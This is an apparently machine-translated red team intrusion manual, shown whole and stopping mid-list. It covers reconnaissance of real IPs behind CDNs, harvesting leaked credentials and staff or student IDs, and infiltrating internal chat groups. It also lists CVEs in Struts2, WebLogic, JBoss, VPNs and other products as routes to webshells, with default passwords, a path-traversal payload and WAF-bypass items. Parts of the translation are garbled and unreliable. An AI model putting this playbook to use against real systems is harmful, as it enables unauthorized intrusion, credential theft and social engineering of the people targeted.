Title: Red side personnel practical manual

Brief description of daily procedures

Entry permission=Intranet collection/detection=Exemption of killing [not required]=Crawl login credentials=Cross-platform horizontal=Entry maintenance=Data return=Regular permission maintenance

0x01 Access to the entry permission [In the early reconnaissance, there are not many defensible points in the collection stage, and they are not the center of defense]

1. Find all the real IP segments around the CDN (1). Through multiple PINGs across the country, check whether the IP address is unique to determine whether CDNhttp://ping.chinaz.com/https://tools.ipip.net/ping.phphttps://www.17ce.com/https://www.cdnplanet.com/tools/cdnfinder/(2). Through the previous DNS binding history Record to find the real IP address https://x.threatbook.cn/https://viewdns.info/https://www.ip138.com/http://toolbar.netcraft.com/site_report?url=https://securitytrails.com/(3). By obtaining multiple subdomains and pinging multiple subdomains in batches, you can determine the IP of the subdomain The segment is the real IP segment (the main site uses CND, while the subdomain sub-site does not use Cdn to resolve) Layer subdomain excavator/GoogleHackinghttps://phpinfo.me/domain/http://tool.chinaz.com/subdomain/https://github.com/lijiejie/subDomainsBrute(4). Use SSL certificate to find the real original IPhttps://c ensys.io/https://crt.sh/(5). Use foreign host to resolve domain name https://asm.ca.com/zh_cn/ping.phphttps://asm.saas.broadcom.com/zh_cn/register.phphttps://dnscheck.pingdom.com(6). Website vulnerability search such as phpinfo or github sensitive information leakage or Apache status and Jboss status sensitive information leakage, web source code leakage, svn information leakage letter, github information leakage (7). Website email subscriptions look for RSS email subscriptions. Many websites come with sendmail and will send us an email. At this time, checking the email source code will contain the server's real IP. (8). Invade CDN and enter through loopholes or weak social workers' passwords. (9). Obtain the real IP through ZMAP and Zgrab's full network scanning: https://www.ip2location.com/free/visitor-blockerhttps://www.ipdeny.com/ipblocks/https://www.t00ls.net/articles-40631.html(Zgrab)https://levyhsu.com/2017/05/%e5%88%a9%e7% 94%a8zgrab%e7%bb%95cdn%e6%89%be%e7%9c%9f%e5%ae%9eip/http://bobao.360.cn/learning/detail/211.html(ZMAP)(10).Cyberspace security engine search Zhong Kui's Eye: https://www.zoomeye.orgShodan: https://www.shodan.ioFofa: https://fofa.s(11).Fantasy ping such as ping www.163.com. If ping 163.con, it can bypass (12). The old domain name of the previous one can be pinged (13). F5 LTM decoding method When the server uses F5 LTM for load balancing, the real IP can also be obtained by decoding the set-cookie keyword, for example: Set-Cookie: BIGipServerpool_8.29_8030=487098378.24095.0000. First take out the decimal number of the first section, namely 487098378, then convert it into hexadecimal number 1d08880a, then from the back to the front, take the four-digit number, that is, 0a.88.08.1d, and finally convert them into decimal number 10.136.8.29 in turn, which is the last real ip2. Various web management backend login ports for finding the target (1) Bulk crawl all real C segments of the target Web banner tool: iisput

(2). Batch basic service port scanning, detection and identification tools for all real C segments of the target: Yujian Port Scan, Goby

(3). Try whether the target DNS allows the area transmission. If it is not allowed, continue to try to blast the subdomain DNS domain transmission: C:\Users\ljnslookup default server : UnKnownAddress: 211.82.100.1 server dns1.thnu.edu.cn default server : dns1.thnu.edu.cnAddress: 125.223.168.5 ls thnu.edu.cn subdomain name explosion: Layer(4). Bulk crawl all target subdomains Web banner tool: Layer (5), batch basic service port detection and identification tool for all subdomains of the target: Yujian port scan, Goby (6) batch identify the web program fingerprint of all surviving Web sites and its detailed version https://github.com/EdgeSecurityTeam/EHolehttps://github.com/zhzyker/vulmap http://finger.tidesec.com/http://whatweb.bugscaner.com/look/https://fp.shuziguanxing.com/#/https://www.yunsee.cn/(6) Find various sensitive files and account passwords leaked by the target from Git, and occasionally you can even encounter various clouds accidentally leaked by the target. 'AccessKey'https://github.com/0xbug/Hawkeyehttps://github.com/FeeiCN/GSIL (6) Find various sensitive files and account passwords leaked by the target from the network disk/Baidu Library http://www.daysou.com/(Network disk search)

(7) Find various sensitive account passwords that the target has leaked from the third-party historical vulnerability database [Domestic targets are very useful] https://www.madebug.net/(8) Various sensitive file tools leaked in the target Svn: Seay SVN vulnerability exploit tool

(9) Website directory scan [Find all kinds of sensitive files leaked by the target website, website backup files, sensitive configuration files, source code, other people's webshells, etc.] Tools: Yujian Directory, dirsearchhttps://github.com/foryujian/yjdirscanhttps://github.com/maurosoria/dirsearch

(10) Various sensitive information leaked by the target site itself in the front-end code

(11)fofa/shodan/bing/google hacking In-depth utilization

(12) Collect target student number/employee work number/target email [and go to various social work databases to batch check whether these email addresses have leaked passwords] Student student number official website and Tieba forum collect, employee work number search on the official website or social work database and github

(13) The target provides various technical documents/wikis and various account passwords and other sensitive information.

(14) Target WeChat applet and public account (15) Analyze target app Web requests (16) Use js probe to collect target intranet information

(17) Find ways to mix in various internal QQ groups/WeChat groups

(18) Analyze target direct suppliers [especially technology outsourcing]

(19) Create a targeted weak password dictionary based on various information collected earlier https://xsshs.cn/xss.php?do=pass

(20) Waf type recognition used by the target and bypass https://github.com/EnableSecurity/wafw00f (waf recognition)

(21) BypassWAF file upload/read/download

(22) BypassWAF Sql injection

(23) BypassWAF RCE (24) BypassWAF Various types of Java Web middleware known Nday vulnerabilities

(25) BypassWAF Webshell Free from killing

More, please add and correct.

0x02 Access to the entry permission [External Defense Center ("Focus on Top")]

This stage is mainly aimed at the mainstream 'middleware + open source programs + web service components' various known Nday vulnerabilities

The following has been sorted in detail based on the 'difficulty of actual attack utilization' and 'high and low shell permissions obtained' as the standards. Since it is completely guided by practical use

Therefore, I only selected some 'middleware', 'open source programs' and 'web components' that are relatively common and can effectively assist in gettingshell in practice.

A variety of known Nday exploits for various Java middleware

Unlike other script-like web programs, Java's running permissions are usually relatively high, and most of them are directly running with root/administrator/system permissions.

Therefore, the shell permissions obtained are generally very high, and they are usually directly server permissions

Especially in various red team scenarios, intruders generally choose these points first and use this as a breakthrough to obtain a stable springboard entry permission.

Regarding which industries particularly like to use which middleware, these should also be analyzed and summarized in advance.

Struts2Struts2-005

Struts2-008

Struts2-009

Struts2-013

Struts2-016 (In fact, many old systems have missed this hole, and the success rate is high)

Struts2-019

Struts2-020

Struts2-devmode

Struts2-032

Struts2-033

Struts2-037

Struts2-045

Struts2-046

Struts2-048

Struts2-052

Struts2-053

Struts2-057

Utilization tool: https://github.com/HatBoy/Struts2-ScanweblogicCVE-2019-2725

CVE-2019-2729

CVE-2018-3191

CVE-2018-2628

CVE-2018-2893

CVE-2018-2894

CVE-2017-3506

CVE-2017-10271

CVE-2017-3248

CVE-2016-0638

CVE-2016-3510

CVE-2015-4852

CVE-2014-4210

SSRF

Weak console password, deploy webshell

Tool checking and exploitation: https://github.com/0xn0ne/weblogicScanner (tool checking) https://github.com/zhzyker/expub/tree/master/weblogic (tool exploitation) JbossCVE-2015-7501

CVE-2017-7504

CVE-2017-12149

Unauthorized access, deploy webshell

Weak console password, deploy webshell

Utilization tool: https://github.com/joaomatosf/jexbosshttps://github.com/joaomatosf/JavaDeserH2HCwildfly [jboss 7.x is renamed wildfly] console weak password, deploy webshell

TomcatCVE-2016-8735

CVE-2017-12615 [ readonly, it is less likely to be set to true, and it is a little useless]

CVE-2020-1938 [AJP protocol vulnerability, not many people directly expose port 8009 to the external network, which is a bit useless]

Weak password on the console, webshelll is deployed [Note : version 7.x, an explosion-proof mechanism is added by default]

Vulnerability exploit summary: https://blog.csdn.net/weixin_42918771/article/details/104844367https://mp.weixin.qq.com/s/ZXoCJ9GhMaTvVFeYn8vMUAhttps://saucer-man.com/information_security/507.html#cl-11 JekinsCVE-2018-1999002 [Arbitrary file reading]

Unauthorized access, arbitrary command execution

Weak password on the console, any command execution

Vulnerability exploit summary: https://www.cnblogs.com/junsec/p/11593556.htmlhttps://misakikata.github.io/2020/03/Jenkins%E6%BC%8F%E6%B4%9E%E9%9B%86%E5%90%88%E5%A4%8D%E7%8E%B0/https://github.com/gquere/pwn_jenkins ElasticSearchCVE-2014-3120 [Specially for old versions (no sandbox) RCE]

CVE-2015-1427 [Groovy RCE]

CVE-2015-3337 [Arbitrary file reading]

Unauthorized access, sensitive information leaked

Vulnerability summary: https://jishuin.proginn.com/p/763bfbd3aa0dhttps://mp.weixin.qq.com/s?__biz=MzAwMjgwMTU1Mg==mid=2247484799idx=2sn=b91f5bc7a31f5786a66f39599ea44bffhttps://blog.csdn.net/u011066706/article/details/51175761 https://www.cnblogs.com/AtesetEnginner/p/12060537.html The default account password of RabbitMQ weak password is guest/guest (default port: 15672, 25672, 15692)

Glassfish arbitrary file reading [low version]

Weak console password, deploy webshell

Vulnerability exploit: http://ip:port/theme/META-INF/%c0.%co./%c0.%co./%c0.%co./%c0.%co./%c0.%co./%c0.%co./xxxpath/xxxfilehttps://www.lxhsec.com/2019/03/04/middleware/IBM WebsphereJava Deserialization

Weak console password, deploy webshell

Vulnerability exploithttps://www.lxhsec.com/2019/03/04/middleware/https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/WebSphere/CVE-2020-4643%20IBM%20WebSphere%E5%AD%98%E5 %9C%A8XXE%E5%A4%96%E9%83%A8%E5%AE%9E%E4%BD%93%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/https://github.com/Ares-X/VulWikihttps://xz.aliyun.com/t/8248 Axis2 arbitrary file reading

Directory traversal

Vulnerability exploit: https://xz.aliyun.com/t/6196https://paper.seebug.org/1489/#23-axis2https://wiki.96.mk/Web%E5%AE%89%E5%85%A8/Apache%20Axis/%EF%BC%88CVE-2019-0227%EF%BC%89Apache%20Axis %201.4%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/https://github.com/CaledoniaProject/AxisInvokerhttps://github.com/Fnzer0/Axis-RCEhttps://paper.seebug.org/1489/Apache ActiveMQ is not authorized to access, and the fileserver before 5.12 exists and PUT is written arbitrarily

CVE-2015-5254

Vulnerability exploit: http://wiki.sentrylab.cn/0day/ActiveMQ/3.htmlhttps://www.freebuf.com/column/161188.htmlhttps://www.taodudu.cc/news/show-2345492.html Apache SolrCVE-2017-12629

CVE-2019-0193 [Apache Solr 5.x - 8.2.0]

Exploit: https://xz.aliyun.com/search?keyword=Solrhttps://www.jianshu.com/p/43e7f13e2058https://caiqiqi.github.io/2019/11/03/Apache-Solr%E6%BC%8F%E6%B4%9E%E5%90%88%E9%9B%86/https://cloud.tencent.com/developer/article/1810723 http://wiki.peiqi.tech/PeiQi_Wiki/Web%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%BC%8F%E6%B4%9E/Apache/Apache%20Solr/?h=Apache%20Solr Apache Zookeeper is not authorized to access, sensitive information is leaked

Apache Shiro deserialization fastjson=1.2.47 Deserialization utilization

For various Windows php integrated environments [Because the Webshell permissions obtained by such environments are relatively high, it is usually the first choice for red team personnel]

AppServ

Xampp

pagoda

PhpStudy

.

Known Nday vulnerability exploits for various open source programs

Dedecms background weak password, series known Nday vulnerability exploit

thinkphp 5.x background weak password, series known Nday vulnerability exploit

phpcms background weak password, series known Nday vulnerability exploit

ecshop background weak password, series known Nday vulnerability exploit

Metinfo background weak password, series known nday vulnerability exploit

Discuz background weak password, series known Nday vulnerability exploit

Empire cms background weak password, series known Nday vulnerability exploit

phpmyadmin database weak password, series known Nday vulnerability exploit

Wordpress background weak password, series known Nday vulnerability exploit

Joomla background weak password, series known Nday vulnerability exploit

drupal CVE-2018-7600, weak backend password, series known Nday vulnerability exploit

.

Known Nday exploits for various other web components

IIS 6.0 RCE short file vulnerability

PUT write arbitrarily

Webdav RCE CVE-2017-7269

Zendao Project Management System SQL Injection

File reading

Remote execution

Tongda OASQL Injection

Upload any

Exchange uses interface to enumerate mailbox usernames

Weak password blasting for each interface

CVE-2020-0688 [The prerequisite for utilization is that you must have any email user permission first]

.

Zimbra [ XXE + SSRF=RCE ]CVE-2013-7091

CVE-2016-9924

CVE-2019-9670

CitrixCVE-2019-19781

Jumpserver authentication bypass

ZabbixCVE-2017-2824

SQL Injection [2.0 Old Version]

Weak password on the console, sensitive machine information leaks

Cacti version SQL injection

Weak console password

NagiosCVE-2016-9565

Weak console password

Webmin RCECVE-2019-15107

PHPMailerCVE-2016-10033

Fanwei OA remote code execution Kingdee OA SQL injection Coremail sensitive file leak UEditor upload any file OpenSSL heart drop blood grab plain text account password [Heartbleed] shell break vulnerability [Shellshock]

A variety of regular basic web vulnerabilities that can quickly getshell [Note: Some vulnerabilities are actually difficult to effectively and blindly detect without reviewing the code]

weak password in the background

SSRF

sql injection

Overreach of authority

Command/Code Execution/Deserialization

Upload/download/read any file

Include

XSS (In fact, XSS is only valuable when it is targeted at certain specific emails and has a browser 0day in hand. In fact, it is not very fatal in the red team scenario)

Business logic vulnerability

For various uses of various boundary network devices, mainly web management console login weak passwords and various known Nday attacks.

Pulse Secure VPNCVE-2019-11510 [Arbitrary file reading]

Fortinet VPNCVE-2018-13379 [File Reading]

Sangfor Vpn RCE

0x03 Access to entry permissions [Specially for various getshell utilization of various basic service ports, defense focus ("top priority")]

Here we only select some services that can really help getshell in practice, and some other relatively marginal services are not mentioned.

Similarly, the detailed sorting of the criteria was based on the 'difficulty of actual attack utilization' and 'the shell permissions obtained'

As follows, a brief description is given on the specific attack methods for each port.

Top Port ListMssql [Default work on tcp 1433 port, weak password, sensitive account password leakage, privilege raising, remote execution, backdoor implantation]

SMB [Default work on tcp port 445, weak password, remote execution, backdoor implantation]

WMI [Default work on tcp port 135, weak password, remote execution, backdoor implantation]

WinRM [The default work on tcp 5985 port, this item is mainly for some higher versions of Windows, weak passwords, remote execution, and backdoor implantation]

RDP [By default, it works on tcp 3389 port, weak password, remote execution, shift class backdoor left by others]

SSH [Default work on tcp 22 port, weak password, remote execution, backdoor implantation]

ORACLE [Default work on tcp 1521 port, weak password, sensitive account password leakage, privilege raising, remote execution, backdoor implantation]

Mysql [By default, it works on tcp 3306 port, weak password, sensitive account password leakage, and raising rights (only applicable to some old systems)]

REDIS [Default work on tcp port 6379, weak password, unauthorized access, write files (webshell, start items, scheduled tasks), raising permissions]

POSTGRESQL[Default work on tcp 5432 port, weak password, sensitive information leakage]

LDAP [Default work on tcp port 389, unauthorized access, weak password, sensitive account password leakage]

SMTP [By default, username enumeration vulnerability, weak password, sensitive information leakage caused by service misconfiguration]

POP3 [Default work on tcp port 110, weak password, sensitive information leakage]

IMAP [Default work on tcp port 143, weak password, sensitive information leakage]

Exchange [Default work on tcp 443 port, weak password blasting eg: Owa,ews,oab,AutoDiscover. pth off-mail, sensitive information leak.]

VNC [Default work on tcp port 5900, weak password]

FTP [By default, it works on tcp 21 port, weak password, anonymous access/writable, sensitive information leakage]

Rsync [Default work on tcp 873 port, unauthorized, weak password, sensitive information leakage]

Mongodb [Default work on tcp 27017 port, unauthorized, weak password]

TELNET [Default work on tcp 23 port, weak password, backdoor implantation]

SVN [Default work on tcp 3690 port, weak password, sensitive information leakage